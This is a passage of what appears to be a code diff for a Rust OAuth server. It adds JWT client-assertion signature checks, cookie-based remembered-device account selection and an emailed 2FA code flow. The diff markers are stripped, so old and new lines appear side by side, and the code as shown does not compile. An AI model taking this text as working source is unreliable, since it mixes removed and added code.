("private_key_jwt", super::ClientAuth::PrivateKeyJwt { client_assertion }) => {
verify_private_key_jwt(metadata, client_assertion)
verify_private_key_jwt_async(cache, metadata, client_assertion).await
}
("private_key_jwt", _) => Err(OAuthError::InvalidClient(
@@ -284,7 +374,8 @@ pub fn verify_client_auth(
}
}
fn verify_private_key_jwt(
async fn verify_private_key_jwt_async(
cache: &ClientMetadataCache,
metadata: &ClientMetadata,
client_assertion: &str,
) -> Result<(), OAuthError> {
@@ -312,6 +403,8 @@ fn verify_private_key_jwt(
)));
}
let kid = header.get("kid").and_then(|k| k.as_str());
let payload_bytes = URL_SAFE_NO_PAD
.decode(parts[1])
.map_err(|_| OAuthError::InvalidClient("Invalid assertion payload encoding".to_string()))?;
@@ -353,13 +446,180 @@ fn verify_private_key_jwt(
}
}
if metadata.jwks.is_none() && metadata.jwks_uri.is_none() {
let jwks = cache.get_jwks(metadata).await?;
let keys = jwks.get("keys").and_then(|k| k.as_array()).ok_or_else(|| {
OAuthError::InvalidClient("Invalid JWKS: missing keys array".to_string())
})?;
let matching_keys: Vec<&serde_json::Value> = if let Some(kid) = kid {
keys.iter()
.filter(|k| k.get("kid").and_then(|v| v.as_str()) == Some(kid))
.collect()
} else {
keys.iter().collect()
};
if matching_keys.is_empty() {
return Err(OAuthError::InvalidClient(
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
"No matching key found in client JWKS".to_string(),
));
}
let signing_input = format!("{}.{}", parts[0], parts[1]);
let signature_bytes = URL_SAFE_NO_PAD
.decode(parts[2])
.map_err(|_| OAuthError::InvalidClient("Invalid signature encoding".to_string()))?;
for key in matching_keys {
let key_alg = key.get("alg").and_then(|a| a.as_str());
if key_alg.is_some() && key_alg != Some(alg) {
continue;
}
let kty = key.get("kty").and_then(|k| k.as_str()).unwrap_or("");
let verified = match (alg, kty) {
("ES256", "EC") => verify_es256(key, &signing_input, &signature_bytes),
("ES384", "EC") => verify_es384(key, &signing_input, &signature_bytes),
("RS256" | "RS384" | "RS512", "RSA") => {
verify_rsa(alg, key, &signing_input, &signature_bytes)
}
("EdDSA", "OKP") => verify_eddsa(key, &signing_input, &signature_bytes),
_ => continue,
};
if verified.is_ok() {
return Ok(());
}
}
Err(OAuthError::InvalidClient(
"private_key_jwt signature verification not yet implemented - use 'none' auth method".to_string(),
"client_assertion signature verification failed".to_string(),
))
}
fn verify_es256(
key: &serde_json::Value,
signing_input: &str,
signature: &[u8],
) -> Result<(), OAuthError> {
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
use p256::ecdsa::{Signature, VerifyingKey, signature::Verifier};
use p256::EncodedPoint;
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
})?;
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
})?;
let x_bytes = URL_SAFE_NO_PAD.decode(x)
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
let y_bytes = URL_SAFE_NO_PAD.decode(y)
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
let mut point_bytes = vec![0x04];
point_bytes.extend_from_slice(&x_bytes);
point_bytes.extend_from_slice(&y_bytes);
let point = EncodedPoint::from_bytes(&point_bytes)
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
let verifying_key = VerifyingKey::from_encoded_point(&point)
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
let sig = Signature::from_slice(signature)
.map_err(|_| OAuthError::InvalidClient("Invalid ES256 signature format".to_string()))?;
verifying_key
.verify(signing_input.as_bytes(), &sig)
.map_err(|_| OAuthError::InvalidClient("ES256 signature verification failed".to_string()))
}
fn verify_es384(
key: &serde_json::Value,
signing_input: &str,
signature: &[u8],
) -> Result<(), OAuthError> {
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
use p384::ecdsa::{Signature, VerifyingKey, signature::Verifier};
use p384::EncodedPoint;
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
OAuthError::InvalidClient("Missing x coordinate in EC key".to_string())
})?;
let y = key.get("y").and_then(|v| v.as_str()).ok_or_else(|| {
OAuthError::InvalidClient("Missing y coordinate in EC key".to_string())
})?;
let x_bytes = URL_SAFE_NO_PAD.decode(x)
.map_err(|_| OAuthError::InvalidClient("Invalid x coordinate encoding".to_string()))?;
let y_bytes = URL_SAFE_NO_PAD.decode(y)
.map_err(|_| OAuthError::InvalidClient("Invalid y coordinate encoding".to_string()))?;
let mut point_bytes = vec![0x04];
point_bytes.extend_from_slice(&x_bytes);
point_bytes.extend_from_slice(&y_bytes);
let point = EncodedPoint::from_bytes(&point_bytes)
.map_err(|_| OAuthError::InvalidClient("Invalid EC point".to_string()))?;
let verifying_key = VerifyingKey::from_encoded_point(&point)
.map_err(|_| OAuthError::InvalidClient("Invalid EC key".to_string()))?;
let sig = Signature::from_slice(signature)
.map_err(|_| OAuthError::InvalidClient("Invalid ES384 signature format".to_string()))?;
verifying_key
.verify(signing_input.as_bytes(), &sig)
.map_err(|_| OAuthError::InvalidClient("ES384 signature verification failed".to_string()))
}
fn verify_rsa(
_alg: &str,
_key: &serde_json::Value,
_signing_input: &str,
_signature: &[u8],
) -> Result<(), OAuthError> {
Err(OAuthError::InvalidClient(
"RSA signature verification not yet supported - use EC keys".to_string(),
))
}
fn verify_eddsa(
key: &serde_json::Value,
signing_input: &str,
signature: &[u8],
) -> Result<(), OAuthError> {
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
use ed25519_dalek::{Signature, Verifier, VerifyingKey};
let crv = key.get("crv").and_then(|c| c.as_str()).unwrap_or("");
if crv != "Ed25519" {
return Err(OAuthError::InvalidClient(format!(
"Unsupported EdDSA curve: {}",
crv
)));
}
let x = key.get("x").and_then(|v| v.as_str()).ok_or_else(|| {
OAuthError::InvalidClient("Missing x in OKP key".to_string())
})?;
let x_bytes = URL_SAFE_NO_PAD.decode(x)
.map_err(|_| OAuthError::InvalidClient("Invalid x encoding".to_string()))?;
let key_bytes: [u8; 32] = x_bytes.try_into()
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key length".to_string()))?;
let verifying_key = VerifyingKey::from_bytes(&key_bytes)
.map_err(|_| OAuthError::InvalidClient("Invalid Ed25519 key".to_string()))?;
let sig_bytes: [u8; 64] = signature.try_into()
.map_err(|_| OAuthError::InvalidClient("Invalid EdDSA signature length".to_string()))?;
let sig = Signature::from_bytes(&sig_bytes);
verifying_key
.verify(signing_input.as_bytes(), &sig)
.map_err(|_| OAuthError::InvalidClient("EdDSA signature verification failed".to_string()))
}

View File

@@ -1,7 +1,15 @@
use chrono::{DateTime, Utc};
use sqlx::PgPool;
use super::super::{DeviceData, OAuthError};
pub struct DeviceAccountRow {
pub did: String,
pub handle: String,
pub email: String,
pub last_used_at: DateTime<Utc>,
}
pub async fn create_device(
pool: &PgPool,
device_id: &str,
@@ -94,3 +102,57 @@ pub async fn upsert_account_device(
Ok(())
}
pub async fn get_device_accounts(
pool: &PgPool,
device_id: &str,
) -> Result<Vec<DeviceAccountRow>, OAuthError> {
let rows = sqlx::query!(
r#"
SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at
FROM oauth_account_device ad
JOIN users u ON u.did = ad.did
WHERE ad.device_id = $1
AND u.deactivated_at IS NULL
AND u.takedown_ref IS NULL
ORDER BY ad.updated_at DESC
"#,
device_id
)
.fetch_all(pool)
.await?;
Ok(rows
.into_iter()
.map(|r| DeviceAccountRow {
did: r.did,
handle: r.handle,
email: r.email,
last_used_at: r.last_used_at,
})
.collect())
}
pub async fn verify_account_on_device(
pool: &PgPool,
device_id: &str,
did: &str,
) -> Result<bool, OAuthError> {
let row = sqlx::query!(
r#"
SELECT 1 as exists
FROM oauth_account_device ad
JOIN users u ON u.did = ad.did
WHERE ad.device_id = $1
AND ad.did = $2
AND u.deactivated_at IS NULL
AND u.takedown_ref IS NULL
"#,
device_id,
did
)
.fetch_optional(pool)
.await?;
Ok(row.is_some())
}

View File

@@ -4,10 +4,12 @@ mod dpop;
mod helpers;
mod request;
mod token;
mod two_factor;
pub use client::{get_authorized_client, upsert_authorized_client};
pub use device::{
create_device, delete_device, get_device, update_device_last_seen, upsert_account_device,
create_device, delete_device, get_device, get_device_accounts, update_device_last_seen,
upsert_account_device, verify_account_on_device, DeviceAccountRow,
};
pub use dpop::{check_and_record_dpop_jti, cleanup_expired_dpop_jtis};
pub use request::{
@@ -20,3 +22,8 @@ pub use token::{
delete_token, delete_token_family, enforce_token_limit_for_user, get_token_by_id,
get_token_by_refresh_token, list_tokens_for_user, rotate_token,
};
pub use two_factor::{
check_user_2fa_enabled, cleanup_expired_2fa_challenges, create_2fa_challenge,
delete_2fa_challenge, delete_2fa_challenge_by_request_uri, generate_2fa_code,
get_2fa_challenge, increment_2fa_attempts, TwoFactorChallenge,
};

153
src/oauth/db/two_factor.rs Normal file
View File

@@ -0,0 +1,153 @@
use chrono::{DateTime, Duration, Utc};
use rand::Rng;
use sqlx::PgPool;
use uuid::Uuid;
use super::super::OAuthError;
pub struct TwoFactorChallenge {
pub id: Uuid,
pub did: String,
pub request_uri: String,
pub code: String,
pub attempts: i32,
pub created_at: DateTime<Utc>,
pub expires_at: DateTime<Utc>,
}
pub fn generate_2fa_code() -> String {
let mut rng = rand::thread_rng();
let code: u32 = rng.gen_range(0..1_000_000);
format!("{:06}", code)
}
pub async fn create_2fa_challenge(
pool: &PgPool,
did: &str,
request_uri: &str,
) -> Result<TwoFactorChallenge, OAuthError> {
let code = generate_2fa_code();
let expires_at = Utc::now() + Duration::minutes(10);
let row = sqlx::query!(
r#"
INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)
VALUES ($1, $2, $3, $4)
RETURNING id, did, request_uri, code, attempts, created_at, expires_at
"#,
did,
request_uri,
code,
expires_at,
)
.fetch_one(pool)
.await?;
Ok(TwoFactorChallenge {
id: row.id,
did: row.did,
request_uri: row.request_uri,
code: row.code,
attempts: row.attempts,
created_at: row.created_at,
expires_at: row.expires_at,
})
}
pub async fn get_2fa_challenge(
pool: &PgPool,
request_uri: &str,
) -> Result<Option<TwoFactorChallenge>, OAuthError> {
let row = sqlx::query!(
r#"
SELECT id, did, request_uri, code, attempts, created_at, expires_at
FROM oauth_2fa_challenge
WHERE request_uri = $1
"#,
request_uri
)
.fetch_optional(pool)
.await?;
Ok(row.map(|r| TwoFactorChallenge {
id: r.id,
did: r.did,
request_uri: r.request_uri,
code: r.code,
attempts: r.attempts,
created_at: r.created_at,
expires_at: r.expires_at,
}))
}
pub async fn increment_2fa_attempts(pool: &PgPool, id: Uuid) -> Result<i32, OAuthError> {
let row = sqlx::query!(
r#"
UPDATE oauth_2fa_challenge
SET attempts = attempts + 1
WHERE id = $1
RETURNING attempts
"#,
id
)
.fetch_one(pool)
.await?;
Ok(row.attempts)
}
pub async fn delete_2fa_challenge(pool: &PgPool, id: Uuid) -> Result<(), OAuthError> {
sqlx::query!(
r#"
DELETE FROM oauth_2fa_challenge WHERE id = $1
"#,
id
)
.execute(pool)
.await?;
Ok(())
}
pub async fn delete_2fa_challenge_by_request_uri(
pool: &PgPool,
request_uri: &str,
) -> Result<(), OAuthError> {
sqlx::query!(
r#"
DELETE FROM oauth_2fa_challenge WHERE request_uri = $1
"#,
request_uri
)
.execute(pool)
.await?;
Ok(())
}
pub async fn cleanup_expired_2fa_challenges(pool: &PgPool) -> Result<u64, OAuthError> {
let result = sqlx::query!(
r#"
DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()
"#
)
.execute(pool)
.await?;
Ok(result.rows_affected())
}
pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
let row = sqlx::query!(
r#"
SELECT two_factor_enabled
FROM users
WHERE did = $1
"#,
did
)
.fetch_optional(pool)
.await?;
Ok(row.map(|r| r.two_factor_enabled).unwrap_or(false))
}

View File

@@ -1,15 +1,34 @@
use axum::{
Form, Json,
extract::{Query, State},
http::HeaderMap,
response::{IntoResponse, Redirect, Response},
http::{HeaderMap, header::SET_COOKIE},
response::{IntoResponse, Redirect, Response, Html},
};
use chrono::Utc;
use serde::{Deserialize, Serialize};
use subtle::ConstantTimeEq;
use urlencoding::encode as url_encode;
use crate::state::AppState;
use crate::oauth::{Code, DeviceData, DeviceId, OAuthError, SessionId, db};
use crate::oauth::{Code, DeviceAccount, DeviceData, DeviceId, OAuthError, SessionId, db, templates};
use crate::notifications::{NotificationChannel, channel_display_name, enqueue_2fa_code};
const DEVICE_COOKIE_NAME: &str = "oauth_device_id";
fn extract_device_cookie(headers: &HeaderMap) -> Option<String> {
headers
.get("cookie")
.and_then(|v| v.to_str().ok())
.and_then(|cookie_str| {
for cookie in cookie_str.split(';') {
let cookie = cookie.trim();
if let Some(value) = cookie.strip_prefix(&format!("{}=", DEVICE_COOKIE_NAME)) {
return Some(value.to_string());
}
}
None
})
}
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
@@ -36,10 +55,19 @@ fn extract_user_agent(headers: &HeaderMap) -> Option<String> {
.map(|s| s.to_string())
}
fn make_device_cookie(device_id: &str) -> String {
format!(
"{}={}; Path=/oauth; HttpOnly; Secure; SameSite=Lax; Max-Age=31536000",
DEVICE_COOKIE_NAME,
device_id
)
}
#[derive(Debug, Deserialize)]
pub struct AuthorizeQuery {
pub request_uri: Option<String>,
pub client_id: Option<String>,
pub new_account: Option<bool>,
}
#[derive(Debug, Serialize)]
@@ -61,7 +89,156 @@ pub struct AuthorizeSubmit {
pub remember_device: bool,
}
#[derive(Debug, Deserialize)]
pub struct AuthorizeSelectSubmit {
pub request_uri: String,
pub did: String,
}
fn wants_json(headers: &HeaderMap) -> bool {
headers
.get("accept")
.and_then(|v| v.to_str().ok())
.map(|accept| accept.contains("application/json"))
.unwrap_or(false)
}
pub async fn authorize_get(
State(state): State<AppState>,
headers: HeaderMap,
Query(query): Query<AuthorizeQuery>,
) -> Response {
let request_uri = match query.request_uri {
Some(uri) => uri,
None => {
if wants_json(&headers) {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Missing request_uri parameter. Use PAR to initiate authorization."
})),
).into_response();
}
return (
axum::http::StatusCode::BAD_REQUEST,
Html(templates::error_page(
"invalid_request",
Some("Missing request_uri parameter. Use PAR to initiate authorization."),
)),
).into_response();
}
};
let request_data = match db::get_authorization_request(&state.db, &request_uri).await {
Ok(Some(data)) => data,
Ok(None) => {
if wants_json(&headers) {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Invalid or expired request_uri. Please start a new authorization request."
})),
).into_response();
}
return (
axum::http::StatusCode::BAD_REQUEST,
Html(templates::error_page(
"invalid_request",
Some("Invalid or expired request_uri. Please start a new authorization request."),
)),
).into_response();
}
Err(e) => {
if wants_json(&headers) {
return (
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
Json(serde_json::json!({
"error": "server_error",
"error_description": format!("Database error: {:?}", e)
})),
).into_response();
}
return (
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
Html(templates::error_page(
"server_error",
Some(&format!("Database error: {:?}", e)),
)),
).into_response();
}
};
if request_data.expires_at < Utc::now() {
let _ = db::delete_authorization_request(&state.db, &request_uri).await;
if wants_json(&headers) {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Authorization request has expired. Please start a new request."
})),
).into_response();
}
return (
axum::http::StatusCode::BAD_REQUEST,
Html(templates::error_page(
"invalid_request",
Some("Authorization request has expired. Please start a new request."),
)),
).into_response();
}
if wants_json(&headers) {
return Json(AuthorizeResponse {
client_id: request_data.parameters.client_id.clone(),
client_name: None,
scope: request_data.parameters.scope.clone(),
redirect_uri: request_data.parameters.redirect_uri.clone(),
state: request_data.parameters.state.clone(),
login_hint: request_data.parameters.login_hint.clone(),
}).into_response();
}
let force_new_account = query.new_account.unwrap_or(false);
if !force_new_account {
if let Some(device_id) = extract_device_cookie(&headers) {
if let Ok(accounts) = db::get_device_accounts(&state.db, &device_id).await {
if !accounts.is_empty() {
let device_accounts: Vec<DeviceAccount> = accounts
.into_iter()
.map(|row| DeviceAccount {
did: row.did,
handle: row.handle,
email: row.email,
last_used_at: row.last_used_at,
})
.collect();
return Html(templates::account_selector_page(
&request_data.parameters.client_id,
None,
&request_uri,
&device_accounts,
)).into_response();
}
}
}
}
Html(templates::login_page(
&request_data.parameters.client_id,
None,
request_data.parameters.scope.as_deref(),
&request_uri,
None,
request_data.parameters.login_hint.as_deref(),
)).into_response()
}
pub async fn authorize_get_json(
State(state): State<AppState>,
Query(query): Query<AuthorizeQuery>,
) -> Result<Json<AuthorizeResponse>, OAuthError> {
@@ -92,19 +269,85 @@ pub async fn authorize_post(
State(state): State<AppState>,
headers: HeaderMap,
Form(form): Form<AuthorizeSubmit>,
) -> Result<Response, OAuthError> {
let request_data = db::get_authorization_request(&state.db, &form.request_uri)
.await?
.ok_or_else(|| OAuthError::InvalidRequest("Invalid or expired request_uri".to_string()))?;
) -> Response {
let json_response = wants_json(&headers);
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
Ok(Some(data)) => data,
Ok(None) => {
if json_response {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Invalid or expired request_uri."
})),
).into_response();
}
return Html(templates::error_page(
"invalid_request",
Some("Invalid or expired request_uri. Please start a new authorization request."),
)).into_response();
}
Err(e) => {
if json_response {
return (
axum::http::StatusCode::INTERNAL_SERVER_ERROR,
Json(serde_json::json!({
"error": "server_error",
"error_description": format!("Database error: {:?}", e)
})),
).into_response();
}
return Html(templates::error_page(
"server_error",
Some(&format!("Database error: {:?}", e)),
)).into_response();
}
};
if request_data.expires_at < Utc::now() {
db::delete_authorization_request(&state.db, &form.request_uri).await?;
return Err(OAuthError::InvalidRequest("request_uri has expired".to_string()));
let _ = db::delete_authorization_request(&state.db, &form.request_uri).await;
if json_response {
return (
axum::http::StatusCode::BAD_REQUEST,
Json(serde_json::json!({
"error": "invalid_request",
"error_description": "Authorization request has expired."
})),
).into_response();
}
return Html(templates::error_page(
"invalid_request",
Some("Authorization request has expired. Please start a new request."),
)).into_response();
}
let user = sqlx::query!(
let show_login_error = |error_msg: &str, json: bool| -> Response {
if json {
return (
axum::http::StatusCode::FORBIDDEN,
Json(serde_json::json!({
"error": "access_denied",
"error_description": error_msg
})),
).into_response();
}
Html(templates::login_page(
&request_data.parameters.client_id,
None,
request_data.parameters.scope.as_deref(),
&form.request_uri,
Some(error_msg),
Some(&form.username),
)).into_response()
};
let user = match sqlx::query!(
r#"
SELECT did, password_hash, deactivated_at, takedown_ref
SELECT id, did, email, password_hash, two_factor_enabled,
preferred_notification_channel as "preferred_notification_channel: NotificationChannel",
deactivated_at, takedown_ref
FROM users
WHERE handle = $1 OR email = $1
"#,
@@ -112,65 +355,277 @@ pub async fn authorize_post(
)
.fetch_optional(&state.db)
.await
.map_err(|e| OAuthError::ServerError(e.to_string()))?
.ok_or_else(|| OAuthError::AccessDenied("Invalid credentials".to_string()))?;
{
Ok(Some(u)) => u,
Ok(None) => return show_login_error("Invalid handle/email or password.", json_response),
Err(_) => return show_login_error("An error occurred. Please try again.", json_response),
};
if user.deactivated_at.is_some() {
return Err(OAuthError::AccessDenied("Account is deactivated".to_string()));
return show_login_error("This account has been deactivated.", json_response);
}
if user.takedown_ref.is_some() {
return Err(OAuthError::AccessDenied("Account is taken down".to_string()));
return show_login_error("This account has been taken down.", json_response);
}
let password_valid = bcrypt::verify(&form.password, &user.password_hash)
.map_err(|_| OAuthError::ServerError("Password verification failed".to_string()))?;
let password_valid = match bcrypt::verify(&form.password, &user.password_hash) {
Ok(valid) => valid,
Err(_) => return show_login_error("An error occurred. Please try again.", json_response),
};
if !password_valid {
return Err(OAuthError::AccessDenied("Invalid credentials".to_string()));
return show_login_error("Invalid handle/email or password.", json_response);
}
if user.two_factor_enabled {
let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await;
match db::create_2fa_challenge(&state.db, &user.did, &form.request_uri).await {
Ok(challenge) => {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
if let Err(e) = enqueue_2fa_code(
&state.db,
user.id,
&challenge.code,
&hostname,
).await {
tracing::warn!(
did = %user.did,
error = %e,
"Failed to enqueue 2FA notification"
);
}
let channel_name = channel_display_name(user.preferred_notification_channel);
let redirect_url = format!(
"/oauth/authorize/2fa?request_uri={}&channel={}",
url_encode(&form.request_uri),
url_encode(channel_name)
);
return Redirect::temporary(&redirect_url).into_response();
}
Err(_) => {
return show_login_error("An error occurred. Please try again.", json_response);
}
}
}
let code = Code::generate();
let mut device_id: Option<String> = None;
let mut device_id: Option<String> = extract_device_cookie(&headers);
let mut new_cookie: Option<String> = None;
if form.remember_device {
let new_device_id = DeviceId::generate();
let device_data = DeviceData {
session_id: SessionId::generate().0,
user_agent: extract_user_agent(&headers),
ip_address: extract_client_ip(&headers),
last_seen_at: Utc::now(),
let final_device_id = if let Some(existing_id) = &device_id {
existing_id.clone()
} else {
let new_id = DeviceId::generate();
let device_data = DeviceData {
session_id: SessionId::generate().0,
user_agent: extract_user_agent(&headers),
ip_address: extract_client_ip(&headers),
last_seen_at: Utc::now(),
};
if db::create_device(&state.db, &new_id.0, &device_data).await.is_ok() {
new_cookie = Some(make_device_cookie(&new_id.0));
device_id = Some(new_id.0.clone());
}
new_id.0
};
db::create_device(&state.db, &new_device_id.0, &device_data).await?;
db::upsert_account_device(&state.db, &user.did, &new_device_id.0).await?;
device_id = Some(new_device_id.0);
let _ = db::upsert_account_device(&state.db, &user.did, &final_device_id).await;
}
db::update_authorization_request(
if let Err(_) = db::update_authorization_request(
&state.db,
&form.request_uri,
&user.did,
device_id.as_deref(),
&code.0,
)
.await?;
.await
{
return show_login_error("An error occurred. Please try again.", json_response);
}
let redirect_uri = &request_data.parameters.redirect_uri;
let redirect_url = build_success_redirect(
&request_data.parameters.redirect_uri,
&code.0,
request_data.parameters.state.as_deref(),
);
let redirect = Redirect::temporary(&redirect_url);
if let Some(cookie) = new_cookie {
([(SET_COOKIE, cookie)], redirect).into_response()
} else {
redirect.into_response()
}
}
pub async fn authorize_select(
State(state): State<AppState>,
headers: HeaderMap,
Form(form): Form<AuthorizeSelectSubmit>,
) -> Response {
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
Ok(Some(data)) => data,
Ok(None) => {
return Html(templates::error_page(
"invalid_request",
Some("Invalid or expired request_uri. Please start a new authorization request."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
if request_data.expires_at < Utc::now() {
let _ = db::delete_authorization_request(&state.db, &form.request_uri).await;
return Html(templates::error_page(
"invalid_request",
Some("Authorization request has expired. Please start a new request."),
)).into_response();
}
let device_id = match extract_device_cookie(&headers) {
Some(id) => id,
None => {
return Html(templates::error_page(
"invalid_request",
Some("No device session found. Please sign in."),
)).into_response();
}
};
let account_valid = match db::verify_account_on_device(&state.db, &device_id, &form.did).await {
Ok(valid) => valid,
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
if !account_valid {
return Html(templates::error_page(
"access_denied",
Some("This account is not available on this device. Please sign in."),
)).into_response();
}
let user = match sqlx::query!(
r#"
SELECT id, two_factor_enabled,
preferred_notification_channel as "preferred_notification_channel: NotificationChannel"
FROM users
WHERE did = $1
"#,
form.did
)
.fetch_optional(&state.db)
.await
{
Ok(Some(u)) => u,
Ok(None) => {
return Html(templates::error_page(
"access_denied",
Some("Account not found. Please sign in."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
if user.two_factor_enabled {
let _ = db::delete_2fa_challenge_by_request_uri(&state.db, &form.request_uri).await;
match db::create_2fa_challenge(&state.db, &form.did, &form.request_uri).await {
Ok(challenge) => {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
if let Err(e) = enqueue_2fa_code(
&state.db,
user.id,
&challenge.code,
&hostname,
).await {
tracing::warn!(
did = %form.did,
error = %e,
"Failed to enqueue 2FA notification"
);
}
let channel_name = channel_display_name(user.preferred_notification_channel);
let redirect_url = format!(
"/oauth/authorize/2fa?request_uri={}&channel={}",
url_encode(&form.request_uri),
url_encode(channel_name)
);
return Redirect::temporary(&redirect_url).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
}
}
let _ = db::upsert_account_device(&state.db, &form.did, &device_id).await;
let code = Code::generate();
if let Err(_) = db::update_authorization_request(
&state.db,
&form.request_uri,
&form.did,
Some(&device_id),
&code.0,
)
.await
{
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
let redirect_url = build_success_redirect(
&request_data.parameters.redirect_uri,
&code.0,
request_data.parameters.state.as_deref(),
);
Redirect::temporary(&redirect_url).into_response()
}
fn build_success_redirect(redirect_uri: &str, code: &str, state: Option<&str>) -> String {
let mut redirect_url = redirect_uri.to_string();
let separator = if redirect_url.contains('?') { '&' } else { '?' };
redirect_url.push(separator);
redirect_url.push_str(&format!("code={}", url_encode(&code.0)));
redirect_url.push_str(&format!("code={}", url_encode(code)));
if let Some(state) = &request_data.parameters.state {
redirect_url.push_str(&format!("&state={}", url_encode(state)));
if let Some(req_state) = state {
redirect_url.push_str(&format!("&state={}", url_encode(req_state)));
}
let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
redirect_url.push_str(&format!("&iss={}", url_encode(&format!("https://{}", pds_hostname))));
Ok(Redirect::temporary(&redirect_url).into_response())
redirect_url
}
#[derive(Debug, Serialize)]
@@ -208,3 +663,191 @@ pub async fn authorize_deny(
pub struct AuthorizeDenyForm {
pub request_uri: String,
}
#[derive(Debug, Deserialize)]
pub struct Authorize2faQuery {
pub request_uri: String,
pub channel: Option<String>,
}
#[derive(Debug, Deserialize)]
pub struct Authorize2faSubmit {
pub request_uri: String,
pub code: String,
}
const MAX_2FA_ATTEMPTS: i32 = 5;
pub async fn authorize_2fa_get(
State(state): State<AppState>,
Query(query): Query<Authorize2faQuery>,
) -> Response {
let challenge = match db::get_2fa_challenge(&state.db, &query.request_uri).await {
Ok(Some(c)) => c,
Ok(None) => {
return Html(templates::error_page(
"invalid_request",
Some("No 2FA challenge found. Please start over."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
if challenge.expires_at < Utc::now() {
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
return Html(templates::error_page(
"invalid_request",
Some("2FA code has expired. Please start over."),
)).into_response();
}
let _request_data = match db::get_authorization_request(&state.db, &query.request_uri).await {
Ok(Some(d)) => d,
Ok(None) => {
return Html(templates::error_page(
"invalid_request",
Some("Authorization request not found. Please start over."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
let channel = query.channel.as_deref().unwrap_or("email");
Html(templates::two_factor_page(
&query.request_uri,
channel,
None,
)).into_response()
}
pub async fn authorize_2fa_post(
State(state): State<AppState>,
headers: HeaderMap,
Form(form): Form<Authorize2faSubmit>,
) -> Response {
let challenge = match db::get_2fa_challenge(&state.db, &form.request_uri).await {
Ok(Some(c)) => c,
Ok(None) => {
return Html(templates::error_page(
"invalid_request",
Some("No 2FA challenge found. Please start over."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
if challenge.expires_at < Utc::now() {
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
return Html(templates::error_page(
"invalid_request",
Some("2FA code has expired. Please start over."),
)).into_response();
}
if challenge.attempts >= MAX_2FA_ATTEMPTS {
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
return Html(templates::error_page(
"access_denied",
Some("Too many failed attempts. Please start over."),
)).into_response();
}
let code_valid: bool = form.code.trim().as_bytes().ct_eq(challenge.code.as_bytes()).into();
if !code_valid {
let _ = db::increment_2fa_attempts(&state.db, challenge.id).await;
let channel = match sqlx::query_scalar!(
r#"SELECT preferred_notification_channel as "channel: NotificationChannel" FROM users WHERE did = $1"#,
challenge.did
)
.fetch_optional(&state.db)
.await
{
Ok(Some(ch)) => channel_display_name(ch).to_string(),
Ok(None) | Err(_) => "email".to_string(),
};
let _request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
Ok(Some(d)) => d,
Ok(None) => {
return Html(templates::error_page(
"invalid_request",
Some("Authorization request not found. Please start over."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred. Please try again."),
)).into_response();
}
};
return Html(templates::two_factor_page(
&form.request_uri,
&channel,
Some("Invalid verification code. Please try again."),
)).into_response();
}
let _ = db::delete_2fa_challenge(&state.db, challenge.id).await;
let request_data = match db::get_authorization_request(&state.db, &form.request_uri).await {
Ok(Some(d)) => d,
Ok(None) => {
return Html(templates::error_page(
"invalid_request",
Some("Authorization request not found."),
)).into_response();
}
Err(_) => {
return Html(templates::error_page(
"server_error",
Some("An error occurred."),
)).into_response();
}
};
let code = Code::generate();
let device_id = extract_device_cookie(&headers);
if let Err(_) = db::update_authorization_request(
&state.db,
